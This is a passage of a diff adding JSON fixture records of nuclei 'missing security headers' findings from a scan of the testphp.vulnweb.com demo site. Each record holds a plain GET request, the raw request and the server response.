MSIE and Chrome friendly error page -->\r\n<!-- a padding to disable MSIE and Chrome friendly error page -->\r\n", + "is_llm_used": false, + "tags": [ + 6, + 26, + 9 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 615, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 88, + "endpoint": null, + "target_domain": 1, + "template": "http/misconfiguration/http-missing-security-headers.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/http-missing-security-headers", + "template_id": "http-missing-security-headers", + "matcher_name": "cross-origin-opener-policy", + "name": "HTTP Missing Security Headers", + "severity": 0, + "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary.\n", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36 Edg/112.0.1722.84' 'http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-1'", + "type": "http", + "http_url": "http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-1", + "discovered_date": "2024-11-13T02:41:32.920Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /Mod_Rewrite_Shop/BuyProduct-1 HTTP/1.1\r\nHost: testphp.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36 Edg/112.0.1722.84\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 404 Not Found\r\nConnection: close\r\nTransfer-Encoding: chunked\r\nContent-Type: text/html\r\nDate: Wed, 13 Nov 2024 02:41:31 GMT\r\nServer: nginx/1.19.0\r\n\r\n<html>\r\n<head><title>404 Not Found</title></head>\r\n<body>\r\n<center><h1>404 Not Found</h1></center>\r\n<hr><center>nginx/1.19.0</center>\r\n</body>\r\n</html>\r\n<!-- a padding to disable MSIE and Chrome friendly error page -->\r\n<!-- a padding to disable MSIE and Chrome friendly error page -->\r\n<!-- a padding to disable MSIE and Chrome friendly error page -->\r\n<!-- a padding to disable MSIE and Chrome friendly error page -->\r\n<!-- a padding to disable MSIE and Chrome friendly error page -->\r\n<!-- a padding to disable MSIE and Chrome friendly error page -->\r\n", + "is_llm_used": false, + "tags": [ + 6, + 26, + 9 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 616, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 88, + "endpoint": null, + "target_domain": 1, + "template": "http/misconfiguration/http-missing-security-headers.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/http-missing-security-headers", + "template_id": "http-missing-security-headers", + "matcher_name": "strict-transport-security", + "name": "HTTP Missing Security Headers", + "severity": 0, + "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary.\n", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36 Edg/112.0.1722.84' 'http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-1'", + "type": "http", + "http_url": "http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-1", + "discovered_date": "2024-11-13T02:41:33.083Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /Mod_Rewrite_Shop/BuyProduct-1 HTTP/1.1\r\nHost: testphp.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36 Edg/112.0.1722.84\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 404 Not Found\r\nConnection: close\r\nTransfer-Encoding: chunked\r\nContent-Type: text/html\r\nDate: Wed, 13 Nov 2024 02:41:31 GMT\r\nServer: nginx/1.19.0\r\n\r\n<html>\r\n<head><title>404 Not Found</title></head>\r\n<body>\r\n<center><h1>404 Not Found</h1></center>\r\n<hr><center>nginx/1.19.0</center>\r\n</body>\r\n</html>\r\n<!-- a padding to disable MSIE and Chrome friendly error page -->\r\n<!-- a padding to disable MSIE and Chrome friendly error page -->\r\n<!-- a padding to disable MSIE and Chrome friendly error page -->\r\n<!-- a padding to disable MSIE and Chrome friendly error page -->\r\n<!-- a padding to disable MSIE and Chrome friendly error page -->\r\n<!-- a padding to disable MSIE and Chrome friendly error page -->\r\n", + "is_llm_used": false, + "tags": [ + 6, + 26, + 9 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 617, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 88, + "endpoint": null, + "target_domain": 1, + "template": "http/misconfiguration/http-missing-security-headers.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/http-missing-security-headers", + "template_id": "http-missing-security-headers", + "matcher_name": "content-security-policy", + "name": "HTTP Missing Security Headers", + "severity": 0, + "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary.\n", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0' 'http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-1/3'", + "type": "http", + "http_url": "http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-1/3", + "discovered_date": "2024-11-13T02:41:33.227Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /Mod_Rewrite_Shop/BuyProduct-1/3 HTTP/1.1\r\nHost: testphp.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 200 OK\r\nConnection: close\r\nTransfer-Encoding: chunked\r\nContent-Type: text/html; charset=UTF-8\r\nDate: Wed, 13 Nov 2024 02:41:31 GMT\r\nServer: nginx/1.19.0\r\nX-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1\r\n\r\n<div>Thanks for buying <b> Network Storage D-Link DNS-313 enclosure 1 x SATA</b><br><br></div>\r\n\t\t\t\t", + "is_llm_used": false, + "tags": [ + 6, + 26, + 9 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 618, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 88, + "endpoint": null, + "target_domain": 1, + "template": "http/misconfiguration/http-missing-security-headers.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/http-missing-security-headers", + "template_id": "http-missing-security-headers", + "matcher_name": "x-content-type-options", + "name": "HTTP Missing Security Headers", + "severity": 0, + "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary.\n", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0' 'http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-1/3'", + "type": "http", + "http_url": "http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-1/3", + "discovered_date": "2024-11-13T02:41:33.372Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /Mod_Rewrite_Shop/BuyProduct-1/3 HTTP/1.1\r\nHost: testphp.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 200 OK\r\nConnection: close\r\nTransfer-Encoding: chunked\r\nContent-Type: text/html; charset=UTF-8\r\nDate: Wed, 13 Nov 2024 02:41:31 GMT\r\nServer: nginx/1.19.0\r\nX-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1\r\n\r\n<div>Thanks for buying <b> Network Storage D-Link DNS-313 enclosure 1 x SATA</b><br><br></div>\r\n\t\t\t\t", + "is_llm_used": false, + "tags": [ + 6, + 26, + 9 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 619, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 88, + "endpoint": null, + "target_domain": 1, + "template": "http/misconfiguration/http-missing-security-headers.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/http-missing-security-headers", + "template_id": "http-missing-security-headers", + "matcher_name": "x-permitted-cross-domain-policies", + "name": "HTTP Missing Security Headers", + "severity": 0, + "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary.\n", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0' 'http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-1/3'", + "type": "http", + "http_url": "http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-1/3", + "discovered_date": "2024-11-13T02:41:33.525Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /Mod_Rewrite_Shop/BuyProduct-1/3 HTTP/1.1\r\nHost: testphp.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 200 OK\r\nConnection: close\r\nTransfer-Encoding: chunked\r\nContent-Type: text/html; charset=UTF-8\r\nDate: Wed, 13 Nov 2024 02:41:31 GMT\r\nServer: nginx/1.19.0\r\nX-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1\r\n\r\n<div>Thanks for buying <b> Network Storage D-Link DNS-313 enclosure 1 x SATA</b><br><br></div>\r\n\t\t\t\t", + "is_llm_used": false, + "tags": [ + 6, + 26, + 9 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 620, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 88, + "endpoint": null, + "target_domain": 1, + "template": "http/misconfiguration/http-missing-security-headers.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/http-missing-security-headers", + "template_id": "http-missing-security-headers", + "matcher_name": "cross-origin-embedder-policy", + "name": "HTTP Missing Security Headers", + "severity": 0, + "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary.\n", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0' 'http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-1/3'", + "type": "http", + "http_url": "http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-1/3", + "discovered_date": "2024-11-13T02:41:33.678Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /Mod_Rewrite_Shop/BuyProduct-1/3 HTTP/1.1\r\nHost: testphp.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 200 OK\r\nConnection: close\r\nTransfer-Encoding: chunked\r\nContent-Type: text/html; charset=UTF-8\r\nDate: Wed, 13 Nov 2024 02:41:31 GMT\r\nServer: nginx/1.19.0\r\nX-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1\r\n\r\n<div>Thanks for buying <b> Network Storage D-Link DNS-313 enclosure 1 x SATA</b><br><br></div>\r\n\t\t\t\t", + "is_llm_used": false, + "tags": [ + 6, + 26, + 9 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 621, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 88, + "endpoint": null, + "target_domain": 1, + "template": "http/misconfiguration/http-missing-security-headers.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/http-missing-security-headers", + "template_id": "http-missing-security-headers", + "matcher_name": "cross-origin-resource-policy", + "name": "HTTP Missing Security Headers", + "severity": 0, + "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary.\n", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0' 'http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-1/3'", + "type": "http", + "http_url": "http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-1/3", + "discovered_date": "2024-11-13T02:41:33.837Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /Mod_Rewrite_Shop/BuyProduct-1/3 HTTP/1.1\r\nHost: testphp.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 200 OK\r\nConnection: close\r\nTransfer-Encoding: chunked\r\nContent-Type: text/html; charset=UTF-8\r\nDate: Wed, 13 Nov 2024 02:41:31 GMT\r\nServer: nginx/1.19.0\r\nX-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1\r\n\r\n<div>Thanks for buying <b> Network Storage D-Link DNS-313 enclosure 1 x SATA</b><br><br></div>\r\n\t\t\t\t", + "is_llm_used": false, + "tags": [ + 6, + 26, + 9 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 622, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 88, + "endpoint": null, + "target_domain": 1, + "template": "http/misconfiguration/http-missing-security-headers.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/http-missing-security-headers", + "template_id": "http-missing-security-headers", + "matcher_name": "strict-transport-security", + "name": "HTTP Missing Security Headers", + "severity": 0, + "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary.\n", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0' 'http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-1/3'", + "type": "http", + "http_url": "http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-1/3", + "discovered_date": "2024-11-13T02:41:34.007Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /Mod_Rewrite_Shop/BuyProduct-1/3 HTTP/1.1\r\nHost: testphp.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 200 OK\r\nConnection: close\r\nTransfer-Encoding: chunked\r\nContent-Type: text/html; charset=UTF-8\r\nDate: Wed, 13 Nov 2024 02:41:31 GMT\r\nServer: nginx/1.19.0\r\nX-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1\r\n\r\n<div>Thanks for buying <b> Network Storage D-Link DNS-313 enclosure 1 x SATA</b><br><br></div>\r\n\t\t\t\t", + "is_llm_used": false, + "tags": [ + 6, + 26, + 9 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 623, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 88, + "endpoint": null, + "target_domain": 1, + "template": "http/misconfiguration/http-missing-security-headers.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/http-missing-security-headers", + "template_id": "http-missing-security-headers", + "matcher_name": "permissions-policy", + "name": "HTTP Missing Security Headers", + "severity": 0, + "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary.\n", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0' 'http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-1/3'", + "type": "http", + "http_url": "http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-1/3", + "discovered_date": "2024-11-13T02:41:34.185Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /Mod_Rewrite_Shop/BuyProduct-1/3 HTTP/1.1\r\nHost: testphp.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 200 OK\r\nConnection: close\r\nTransfer-Encoding: chunked\r\nContent-Type: text/html; charset=UTF-8\r\nDate: Wed, 13 Nov 2024 02:41:31 GMT\r\nServer: nginx/1.19.0\r\nX-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1\r\n\r\n<div>Thanks for buying <b> Network Storage D-Link DNS-313 enclosure 1 x SATA</b><br><br></div>\r\n\t\t\t\t", + "is_llm_used": false, + "tags": [ + 6, + 26, + 9 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 624, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 88, + "endpoint": null, + "target_domain": 1, + "template": "http/misconfiguration/http-missing-security-headers.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/http-missing-security-headers", + "template_id": "http-missing-security-headers", + "matcher_name": "x-frame-options", + "name": "HTTP Missing Security Headers", + "severity": 0, + "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary.\n", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0' 'http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-1/3'", + "type": "http", + "http_url": "http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-1/3", + "discovered_date": "2024-11-13T02:41:34.334Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /Mod_Rewrite_Shop/BuyProduct-1/3 HTTP/1.1\r\nHost: testphp.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 200 OK\r\nConnection: close\r\nTransfer-Encoding: chunked\r\nContent-Type: text/html; charset=UTF-8\r\nDate: Wed, 13 Nov 2024 02:41:31 GMT\r\nServer: nginx/1.19.0\r\nX-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1\r\n\r\n<div>Thanks for buying <b> Network Storage D-Link DNS-313 enclosure 1 x SATA</b><br><br></div>\r\n\t\t\t\t", + "is_llm_used": false, + "tags": [ + 6, + 26, + 9 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 625, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 88, + "endpoint": null, + "target_domain": 1, + "template": "http/misconfiguration/http-missing-security-headers.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/http-missing-security-headers", + "template_id": "http-missing-security-headers", + "matcher_name": "referrer-policy", + "name": "HTTP Missing Security Headers", + "severity": 0, + "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary.\n", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0' 'http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-1/3'", + "type": "http", + "http_url": "http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-1/3", + "discovered_date": "2024-11-13T02:41:34.483Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /Mod_Rewrite_Shop/BuyProduct-1/3 HTTP/1.1\r\nHost: testphp.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 200 OK\r\nConnection: close\r\nTransfer-Encoding: chunked\r\nContent-Type: text/html; charset=UTF-8\r\nDate: Wed, 13 Nov 2024 02:41:31 GMT\r\nServer: nginx/1.19.0\r\nX-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1\r\n\r\n<div>Thanks for buying <b> Network Storage D-Link DNS-313 enclosure 1 x SATA</b><br><br></div>\r\n\t\t\t\t", + "is_llm_used": false, + "tags": [ + 6, + 26, + 9 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 626, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 88, + "endpoint": null, + "target_domain": 1, + "template": "http/misconfiguration/http-missing-security-headers.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/http-missing-security-headers", + "template_id": "http-missing-security-headers", + "matcher_name": "clear-site-data", + "name": "HTTP Missing Security Headers", + "severity": 0, + "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary.\n", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0' 'http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-1/3'", + "type": "http", + "http_url": "http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-1/3", + "discovered_date": "2024-11-13T02:41:34.636Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /Mod_Rewrite_Shop/BuyProduct-1/3 HTTP/1.1\r\nHost: testphp.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 200 OK\r\nConnection: close\r\nTransfer-Encoding: chunked\r\nContent-Type: text/html; charset=UTF-8\r\nDate: Wed, 13 Nov 2024 02:41:31 GMT\r\nServer: nginx/1.19.0\r\nX-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1\r\n\r\n<div>Thanks for buying <b> Network Storage D-Link DNS-313 enclosure 1 x SATA</b><br><br></div>\r\n\t\t\t\t", + "is_llm_used": false, + "tags": [ + 6, + 26, + 9 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 627, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 88, + "endpoint": null, + "target_domain": 1, + "template": "http/misconfiguration/http-missing-security-headers.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/http-missing-security-headers", + "template_id": "http-missing-security-headers", + "matcher_name": "cross-origin-opener-policy", + "name": "HTTP Missing Security Headers", + "severity": 0, + "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary.\n", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0' 'http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-1/3'", + "type": "http", + "http_url": "http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-1/3", + "discovered_date": "2024-11-13T02:41:34.790Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /Mod_Rewrite_Shop/BuyProduct-1/3 HTTP/1.1\r\nHost: testphp.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 200 OK\r\nConnection: close\r\nTransfer-Encoding: chunked\r\nContent-Type: text/html; charset=UTF-8\r\nDate: Wed, 13 Nov 2024 02:41:31 GMT\r\nServer: nginx/1.19.0\r\nX-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1\r\n\r\n<div>Thanks for buying <b> Network Storage D-Link DNS-313 enclosure 1 x SATA</b><br><br></div>\r\n\t\t\t\t", + "is_llm_used": false, + "tags": [ + 6, + 26, + 9 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 628, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 88, + "endpoint": null, + "target_domain": 1, + "template": "http/misconfiguration/http-missing-security-headers.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/http-missing-security-headers", + "template_id": "http-missing-security-headers", + "matcher_name": "content-security-policy", + "name": "HTTP Missing Security Headers", + "severity": 0, + "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary.\n", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 12_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.60 Safari/537.36' 'http://testphp.vulnweb.com/CVS/Root'", + "type": "http", + "http_url": "http://testphp.vulnweb.com/CVS/Root", + "discovered_date": "2024-11-13T02:41:34.939Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /CVS/Root HTTP/1.1\r\nHost: testphp.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 12_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.60 Safari/537.36\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 200 OK\r\nConnection: close\r\nContent-Length: 1\r\nAccept-Ranges: bytes\r\nContent-Type: application/octet-stream\r\nDate: Wed, 13 Nov 2024 02:41:32 GMT\r\nEtag: "4dca64a4-1"\r\nLast-Modified: Wed, 11 May 2011 10:27:48 GMT\r\nServer: nginx/1.19.0\r\n\r\n ", + "is_llm_used": false, + "tags": [ + 6, + 26, + 9 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 629, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 88, + "endpoint": null, + "target_domain": 1, + "template": "http/misconfiguration/http-missing-security-headers.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/http-missing-security-headers", + "template_id": "http-missing-security-headers", + "matcher_name": "permissions-policy", + "name": "HTTP Missing Security Headers", + "severity": 0, + "description": "This template searches for missing 